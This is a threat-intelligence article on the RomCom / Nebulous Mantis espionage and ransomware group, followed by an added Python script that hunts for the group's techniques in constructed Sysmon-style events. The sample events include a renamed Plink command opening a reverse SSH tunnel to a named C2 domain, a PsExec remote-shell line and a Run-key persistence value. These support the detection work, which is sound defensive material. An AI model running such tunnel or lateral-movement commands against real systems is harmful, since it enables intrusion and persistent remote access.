Russia-linked Group Nebulous Mantis Targets NATO-Related Defense Organizations

A recent report by PRODAFT researchers has shed light on a sophisticated Russian-speaking cyber espionage group known as Nebulous Mantis, also referred to as Cuba, STORM-0978, Tropical Scorpius, and UNC2596. This group has been targeting critical infrastructure, governments, and NATO-linked entities since 2019, using advanced techniques to evade detection and maintain persistence.

Nebulous Mantis relies on two primary tools: the RomCom RAT (Remote Access Trojan) and Hancitor, which the group has used in spear-phishing campaigns for espionage, lateral movement, and data theft since mid-2022. The RAT supports advanced evasion techniques, including living-off-the-land (LOTL) tactics and encrypted command-and-control (C2) communications.

One of the striking features of Nebulous Mantis is the continuous evolution of its C2 infrastructure: the group relies on bulletproof hosting providers such as LuxHost and AEZA to keep its servers online and out of reach of takedowns, and it rotates its domain names every month. That rotation means static indicator lists go stale quickly and makes it hard for defenders to track the group's activity over time.

The Role of LARVA-290 in Nebulous Mantis

Analysis of the group's infrastructure shows that LARVA-290, an individual who procured intrusion servers for, and personally carried out, numerous ransomware attacks, continues to act as the IT administrator for the Nebulous Mantis team and for RomCom operations. This points to a high degree of organization and coordination among the group's members.

Malicious Campaigns and Tactics

Nebulous Mantis impersonates trusted services such as OneDrive to trick victims into downloading infected files, which are often hosted on Mediafire. Its campaigns are multi-phase intrusions spanning initial access, privilege escalation, and data exfiltration, built on modular malware, LOTL techniques, and evasive C2 infrastructure.

In the post-infection phase, a decoy PDF launches an EXE that first checks for sandbox and analysis markers, then downloads further payloads such as Keyprov.dll. That component loads RomCom's first-stage backdoor, which contacts the C2 servers (e.g., opendnsapi.net) and retrieves encrypted modules over IPFS.

Tools such as WinRAR and Plink are then deployed: stolen data is collected under c:\users\public\music and exfiltrated from there. The malware maintains persistence through registry manipulation.

Ransomware Attacks

In its ransomware operations Nebulous Mantis uses RomCom for stealthy system profiling, credential harvesting, and Active Directory/domain enumeration. The attackers use renamed Sysinternals utilities for lateral movement and WinRAR for data staging.

The operators manage infected hosts and modules, and issue commands, through a C2 panel, and they set up reverse SSH tunnels to retain persistent access to compromised machines.
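The post-infection tradecraft described above (renamed Sysinternals binaries, Plink reverse SSH tunnels, archives staged in c:\users\public\music, registry-based persistence) is concrete enough to hunt for. The following is an added example written for this article, not code from the PRODAFT report or from the group's tooling: it runs simple detection rules over constructed Sysmon-style process, file and registry events. The event layout, the field names, the sample values and the table of PE OriginalFileName strings are assumptions for the example and should be checked against your own telemetry.

```python
"""
Hunting the post-exploitation chain described above over constructed endpoint
telemetry. Added example, not code from the PRODAFT report or the article.
Event shape, field names, sample values and the tool-name table are assumptions.
"""
import re
from pathlib import PureWindowsPath

# Staging directory named in the report, compared case-insensitively.
STAGING_DIR = r"c:\users\public\music"

# PE OriginalFileName values (as Sysmon reports them) mapped to the tool they
# identify. Values assumed for this example; verify against your own binaries.
KNOWN_TOOLS = {
    "plink": "plink",      # PuTTY Link, used here for reverse SSH tunnels
    "psexec.c": "psexec",  # Sysinternals PsExec
    "procdump": "procdump",
    "adexplorer": "adexplorer",
}

ARCHIVE_EXT = {".rar", ".zip", ".7z"}
# plink/ssh remote forward: -R [bind:]port:host:port
REVERSE_TUNNEL = re.compile(r"(?:^|\s)-R\s+(?:\S+:)?\d+:\S+:\d+")
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)


def in_staging_dir(path: str) -> bool:
    return path.lower().startswith(STAGING_DIR)


def check_event(evt: dict) -> list:
    """Return the technique labels one event triggers (possibly several)."""
    findings = []
    image = evt.get("image", "")
    stem = PureWindowsPath(image).stem.lower()
    if evt["id"] == 1:  # process create
        # The binary was renamed if its PE metadata says "plink"/"psexec"
        # but the file on disk is called something else.
        tool = KNOWN_TOOLS.get(evt.get("orig_name", "").lower())
        if tool and tool != stem:
            findings.append("renamed_tool")
        if REVERSE_TUNNEL.search(evt.get("cmdline", "")):
            findings.append("reverse_ssh_tunnel")
        if in_staging_dir(image):
            findings.append("exec_from_staging_dir")
    elif evt["id"] == 11:  # file create
        target = evt.get("target", "")
        if in_staging_dir(target) and PureWindowsPath(target).suffix.lower() in ARCHIVE_EXT:
            findings.append("staging_archive")
    elif evt["id"] == 13:  # registry value set
        if RUN_KEY.search(evt.get("target", "")):
            findings.append("run_key_persistence")
    return findings


def hunt(events: list) -> list:
    """(event index, technique) pairs for every hit across the telemetry."""
    return [(i, f) for i, evt in enumerate(events) for f in check_event(evt)]


def distinct_techniques(events: list) -> list:
    """Sorted set of techniques seen; several together is the chain, not noise."""
    return sorted({f for _, f in hunt(events)})


# Constructed sample telemetry (not real victim data), loosely modelled on
# Sysmon event IDs 1, 11 and 13.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Users\Public\Music\svc.exe", "orig_name": "Plink",
     "cmdline": r"svc.exe -N -R 2222:127.0.0.1:3389 tunnel@opendnsapi.net -pw x"},
    {"id": 1, "image": r"C:\Windows\Temp\upd.exe", "orig_name": "psexec.c",
     "cmdline": r"upd.exe \\fileserver -s cmd.exe"},
    {"id": 11, "image": r"C:\Program Files\WinRAR\Rar.exe",
     "target": r"C:\Users\Public\Music\docs.rar"},
    {"id": 13, "image": r"C:\Users\Public\Music\svc.exe",
     "target": r"HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Software\Microsoft\Windows\CurrentVersion\Run\svc"},
    {"id": 1, "image": r"C:\Program Files\WinRAR\WinRAR.exe", "orig_name": "WinRAR.exe",
     "cmdline": "WinRAR.exe x update.rar"},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe", "orig_name": "NOTEPAD.EXE",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, technique in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {technique}")
    print("techniques seen:", distinct_techniques(SAMPLE_EVENTS))
```

None of these rules is conclusive on its own (administrators do run WinRAR and PsExec), which is why the example also reports the set of distinct techniques seen: a renamed tool, a reverse tunnel, an archive in the public Music folder and a Run-key write on the same host together describe the chain in the report rather than routine activity.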

Data Theft and Ransomware Demands

Once these stages are complete, the Nebulous Mantis team gathers the critical information from the victim machine and uploads it to its C2 servers. Only then does it deploy ransomware, encrypting the data and demanding a ransom (MITRE ATT&CK T1486, Data Encrypted for Impact).

Conclusion

PRODAFT concludes that RomCom poses a major cyber threat because of its technical sophistication, strong operational security, and targeting of critical organizations, a combination that points to risks well beyond typical financially driven cybercrime.

"Throughout the attack lifecycle, Nebulous Mantis exhibits operational discipline in minimizing their footprint, carefully balancing aggressive intelligence collection with stealth requirements," says the report. "This suggests either state-sponsored backing or a professional cybercriminal organization with significant resources."